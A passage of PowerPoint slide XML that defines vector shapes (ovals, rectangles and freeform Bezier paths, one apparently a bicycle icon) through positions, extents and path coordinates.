                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="29" h="106">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="29" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="106"/>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3" name="Oval 94"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11506878" y="6403291"/>
                  <a:ext cx="169839" cy="17350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4" name="Oval 95"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11530094" y="6314096"/>
                  <a:ext cx="123407" cy="129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5" name="Freeform 96"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11795848" y="6464384"/>
                  <a:ext cx="48874" cy="184501"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 40"/>
                    <a:gd name="T1" fmla="*/ 0 h 151"/>
                    <a:gd name="T2" fmla="*/ 40 w 40"/>
                    <a:gd name="T3" fmla="*/ 0 h 151"/>
                    <a:gd name="T4" fmla="*/ 40 w 40"/>
                    <a:gd name="T5" fmla="*/ 151 h 151"/>
                    <a:gd name="T6" fmla="*/ 0 w 40"/>
                    <a:gd name="T7" fmla="*/ 151 h 151"/>
                    <a:gd name="T8" fmla="*/ 0 w 40"/>
                    <a:gd name="T9" fmla="*/ 0 h 151"/>
                    <a:gd name="T10" fmla="*/ 0 w 40"/>
                    <a:gd name="T11" fmla="*/ 0 h 151"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="40" h="151">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="40" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="151"/>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6" name="Oval 97"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11694434" y="6299433"/>
                  <a:ext cx="248037" cy="24559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7" name="Freeform 99"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11974239" y="6519368"/>
                  <a:ext cx="34212" cy="129517"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 28"/>
                    <a:gd name="T1" fmla="*/ 0 h 106"/>
                    <a:gd name="T2" fmla="*/ 28 w 28"/>
                    <a:gd name="T3" fmla="*/ 0 h 106"/>
                    <a:gd name="T4" fmla="*/ 28 w 28"/>
                    <a:gd name="T5" fmla="*/ 106 h 106"/>
                    <a:gd name="T6" fmla="*/ 0 w 28"/>
                    <a:gd name="T7" fmla="*/ 106 h 106"/>
                    <a:gd name="T8" fmla="*/ 0 w 28"/>
                    <a:gd name="T9" fmla="*/ 0 h 106"/>
                    <a:gd name="T10" fmla="*/ 0 w 28"/>
                    <a:gd name="T11" fmla="*/ 0 h 106"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="28" h="106">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="28" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="28" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="106"/>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8" name="Oval 100"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11904594" y="6403291"/>
                  <a:ext cx="171060" cy="17350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79" name="Oval 101"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11927809" y="6314096"/>
                  <a:ext cx="124629" cy="12951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80" name="Rectangle 78"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4484278" y="6634222"/>
                  <a:ext cx="1139993" cy="67203"/>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81" name="Rectangle 76"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8294494" y="6634222"/>
                  <a:ext cx="398325" cy="67204"/>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82" name="Freeform 90"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10436830" y="6464383"/>
                  <a:ext cx="48874" cy="184501"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 40"/>
                    <a:gd name="T1" fmla="*/ 0 h 151"/>
                    <a:gd name="T2" fmla="*/ 40 w 40"/>
                    <a:gd name="T3" fmla="*/ 0 h 151"/>
                    <a:gd name="T4" fmla="*/ 40 w 40"/>
                    <a:gd name="T5" fmla="*/ 151 h 151"/>
                    <a:gd name="T6" fmla="*/ 0 w 40"/>
                    <a:gd name="T7" fmla="*/ 151 h 151"/>
                    <a:gd name="T8" fmla="*/ 0 w 40"/>
                    <a:gd name="T9" fmla="*/ 0 h 151"/>
                    <a:gd name="T10" fmla="*/ 0 w 40"/>
                    <a:gd name="T11" fmla="*/ 0 h 151"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="40" h="151">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="40" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:ln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83" name="Oval 91"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10335415" y="6299434"/>
                  <a:ext cx="248038" cy="24559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84" name="Oval 92"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10370849" y="6169916"/>
                  <a:ext cx="180835" cy="18205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585" name="Rectangle 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9728465" y="6634222"/>
                  <a:ext cx="2531689" cy="67204"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="495" name="Freeform 494"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="8903396" y="6638710"/>
                <a:ext cx="461492" cy="299403"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1443 w 1898"/>
                  <a:gd name="T1" fmla="*/ 464 h 1230"/>
                  <a:gd name="T2" fmla="*/ 1359 w 1898"/>
                  <a:gd name="T3" fmla="*/ 81 h 1230"/>
                  <a:gd name="T4" fmla="*/ 1177 w 1898"/>
                  <a:gd name="T5" fmla="*/ 47 h 1230"/>
                  <a:gd name="T6" fmla="*/ 1062 w 1898"/>
                  <a:gd name="T7" fmla="*/ 17 h 1230"/>
                  <a:gd name="T8" fmla="*/ 1171 w 1898"/>
                  <a:gd name="T9" fmla="*/ 135 h 1230"/>
                  <a:gd name="T10" fmla="*/ 1280 w 1898"/>
                  <a:gd name="T11" fmla="*/ 135 h 1230"/>
                  <a:gd name="T12" fmla="*/ 675 w 1898"/>
                  <a:gd name="T13" fmla="*/ 278 h 1230"/>
                  <a:gd name="T14" fmla="*/ 655 w 1898"/>
                  <a:gd name="T15" fmla="*/ 200 h 1230"/>
                  <a:gd name="T16" fmla="*/ 717 w 1898"/>
                  <a:gd name="T17" fmla="*/ 135 h 1230"/>
                  <a:gd name="T18" fmla="*/ 652 w 1898"/>
                  <a:gd name="T19" fmla="*/ 70 h 1230"/>
                  <a:gd name="T20" fmla="*/ 445 w 1898"/>
                  <a:gd name="T21" fmla="*/ 71 h 1230"/>
                  <a:gd name="T22" fmla="*/ 446 w 1898"/>
                  <a:gd name="T23" fmla="*/ 215 h 1230"/>
                  <a:gd name="T24" fmla="*/ 454 w 1898"/>
                  <a:gd name="T25" fmla="*/ 216 h 1230"/>
                  <a:gd name="T26" fmla="*/ 458 w 1898"/>
                  <a:gd name="T27" fmla="*/ 216 h 1230"/>
                  <a:gd name="T28" fmla="*/ 603 w 1898"/>
                  <a:gd name="T29" fmla="*/ 331 h 1230"/>
                  <a:gd name="T30" fmla="*/ 386 w 1898"/>
                  <a:gd name="T31" fmla="*/ 458 h 1230"/>
                  <a:gd name="T32" fmla="*/ 386 w 1898"/>
                  <a:gd name="T33" fmla="*/ 1230 h 1230"/>
                  <a:gd name="T34" fmla="*/ 911 w 1898"/>
                  <a:gd name="T35" fmla="*/ 885 h 1230"/>
                  <a:gd name="T36" fmla="*/ 911 w 1898"/>
                  <a:gd name="T37" fmla="*/ 885 h 1230"/>
                  <a:gd name="T38" fmla="*/ 921 w 1898"/>
                  <a:gd name="T39" fmla="*/ 883 h 1230"/>
                  <a:gd name="T40" fmla="*/ 931 w 1898"/>
                  <a:gd name="T41" fmla="*/ 880 h 1230"/>
                  <a:gd name="T42" fmla="*/ 935 w 1898"/>
                  <a:gd name="T43" fmla="*/ 877 h 1230"/>
                  <a:gd name="T44" fmla="*/ 943 w 1898"/>
                  <a:gd name="T45" fmla="*/ 870 h 1230"/>
                  <a:gd name="T46" fmla="*/ 945 w 1898"/>
                  <a:gd name="T47" fmla="*/ 869 h 1230"/>
                  <a:gd name="T48" fmla="*/ 1341 w 1898"/>
                  <a:gd name="T49" fmla="*/ 411 h 1230"/>
                  <a:gd name="T50" fmla="*/ 1358 w 1898"/>
                  <a:gd name="T51" fmla="*/ 486 h 1230"/>
                  <a:gd name="T52" fmla="*/ 1126 w 1898"/>
                  <a:gd name="T53" fmla="*/ 844 h 1230"/>
                  <a:gd name="T54" fmla="*/ 1898 w 1898"/>
                  <a:gd name="T55" fmla="*/ 844 h 1230"/>
                  <a:gd name="T56" fmla="*/ 652 w 1898"/>
                  <a:gd name="T57" fmla="*/ 428 h 1230"/>
                  <a:gd name="T58" fmla="*/ 769 w 1898"/>
                  <a:gd name="T59" fmla="*/ 797 h 1230"/>
                  <a:gd name="T60" fmla="*/ 652 w 1898"/>
                  <a:gd name="T61" fmla="*/ 428 h 1230"/>
                  <a:gd name="T62" fmla="*/ 459 w 1898"/>
                  <a:gd name="T63" fmla="*/ 799 h 1230"/>
                  <a:gd name="T64" fmla="*/ 679 w 1898"/>
                  <a:gd name="T65" fmla="*/ 798 h 1230"/>
                  <a:gd name="T66" fmla="*/ 88 w 1898"/>
                  <a:gd name="T67" fmla="*/ 844 h 1230"/>
                  <a:gd name="T68" fmla="*/ 483 w 1898"/>
                  <a:gd name="T69" fmla="*/ 563 h 1230"/>
                  <a:gd name="T70" fmla="*/ 348 w 1898"/>
                  <a:gd name="T71" fmla="*/ 867 h 1230"/>
                  <a:gd name="T72" fmla="*/ 386 w 1898"/>
                  <a:gd name="T73" fmla="*/ 888 h 1230"/>
                  <a:gd name="T74" fmla="*/ 386 w 1898"/>
                  <a:gd name="T75" fmla="*/ 1142 h 1230"/>
                  <a:gd name="T76" fmla="*/ 720 w 1898"/>
                  <a:gd name="T77" fmla="*/ 366 h 1230"/>
                  <a:gd name="T78" fmla="*/ 921 w 1898"/>
                  <a:gd name="T79" fmla="*/ 762 h 1230"/>
                  <a:gd name="T80" fmla="*/ 1214 w 1898"/>
                  <a:gd name="T81" fmla="*/ 844 h 1230"/>
                  <a:gd name="T82" fmla="*/ 1470 w 1898"/>
                  <a:gd name="T83" fmla="*/ 857 h 1230"/>
                  <a:gd name="T84" fmla="*/ 1525 w 1898"/>
                  <a:gd name="T85" fmla="*/ 886 h 1230"/>
                  <a:gd name="T86" fmla="*/ 1554 w 1898"/>
                  <a:gd name="T87" fmla="*/ 831 h 1230"/>
                  <a:gd name="T88" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T89" fmla="*/ 546 h 1230"/>
                  <a:gd name="T90" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T91" fmla="*/ 11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8" h="1230">
                    <a:moveTo>
                      <a:pt x="1512" y="458"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1489" y="458"/>
                      <a:pt x="1466" y="460"/>
                      <a:pt x="1443" y="464"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1354" y="61"/>
                      <a:pt x="1336" y="47"/>
                      <a:pt x="1315" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1171" y="46"/>
                      <a:pt x="1147" y="41"/>
                      <a:pt x="1124" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1107" y="0"/>
                      <a:pt x="1079" y="0"/>
                      <a:pt x="1062" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1045" y="35"/>
                      <a:pt x="1045" y="63"/>
                      <a:pt x="1062" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1112" y="130"/>
                      <a:pt x="1165" y="134"/>
                      <a:pt x="1171" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="656" y="200"/>
                      <a:pt x="657" y="200"/>
                      <a:pt x="658" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="691" y="196"/>
                      <a:pt x="717" y="169"/>
                      <a:pt x="717" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="717" y="102"/>
                      <a:pt x="692" y="75"/>
                      <a:pt x="660" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="658" y="70"/>
                      <a:pt x="655" y="70"/>
                      <a:pt x="652" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="70"/>
                      <a:pt x="448" y="70"/>
                      <a:pt x="445" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="75"/>
                      <a:pt x="381" y="106"/>
                      <a:pt x="381" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="381" y="181"/>
                      <a:pt x="409" y="211"/>
                      <a:pt x="446" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="448" y="216"/>
                      <a:pt x="451" y="216"/>
                      <a:pt x="453" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="455" y="216"/>
                      <a:pt x="457" y="216"/>
                      <a:pt x="458" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="481" y="467"/>
                      <a:pt x="434" y="458"/>
                      <a:pt x="386" y="458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="458"/>
                      <a:pt x="0" y="631"/>
                      <a:pt x="0" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1057"/>
                      <a:pt x="173" y="1230"/>
                      <a:pt x="386" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="585" y="1230"/>
                      <a:pt x="749" y="1079"/>
                      <a:pt x="769" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="915" y="884"/>
                      <a:pt x="918" y="884"/>
                      <a:pt x="921" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="922" y="883"/>
                      <a:pt x="923" y="883"/>
                      <a:pt x="924" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="926" y="882"/>
                      <a:pt x="928" y="881"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="933" y="879"/>
                      <a:pt x="934" y="878"/>
                      <a:pt x="935" y="877"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="936" y="877"/>
                      <a:pt x="937" y="876"/>
                      <a:pt x="938" y="875"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="874"/>
                      <a:pt x="942" y="872"/>
                      <a:pt x="943" y="870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="944" y="870"/>
                      <a:pt x="944" y="870"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1222" y="549"/>
                      <a:pt x="1126" y="685"/>
                      <a:pt x="1126" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1126" y="1057"/>
                      <a:pt x="1299" y="1230"/>
                      <a:pt x="1512" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1725" y="1230"/>
                      <a:pt x="1898" y="1057"/>
                      <a:pt x="1898" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1898" y="631"/>
                      <a:pt x="1725" y="458"/>
                      <a:pt x="1512" y="458"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="652" y="428"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="755" y="684"/>
                      <a:pt x="692" y="586"/>
                      <a:pt x="602" y="525"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="652" y="428"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="679" y="798"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="623" y="649"/>
                      <a:pt x="667" y="718"/>
                      <a:pt x="679" y="798"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="386" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="1141"/>
                      <a:pt x="88" y="1008"/>
                      <a:pt x="88" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="680"/>
                      <a:pt x="221" y="547"/>
                      <a:pt x="386" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="420" y="547"/>
                      <a:pt x="452" y="553"/>
                      <a:pt x="483" y="563"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="340" y="837"/>
                      <a:pt x="340" y="854"/>
                      <a:pt x="348" y="867"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="356" y="880"/>
                      <a:pt x="371" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="659" y="1030"/>
                      <a:pt x="536" y="1141"/>
                      <a:pt x="386" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="921" y="762"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="921" y="762"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1512" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1348" y="1141"/>
                      <a:pt x="1215" y="1008"/>
                      <a:pt x="1214" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1215" y="725"/>
                      <a:pt x="1284" y="623"/>
                      <a:pt x="1385" y="575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1476" y="876"/>
                      <a:pt x="1493" y="888"/>
                      <a:pt x="1512" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1516" y="888"/>
                      <a:pt x="1521" y="888"/>
                      <a:pt x="1525" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1548" y="879"/>
                      <a:pt x="1561" y="855"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
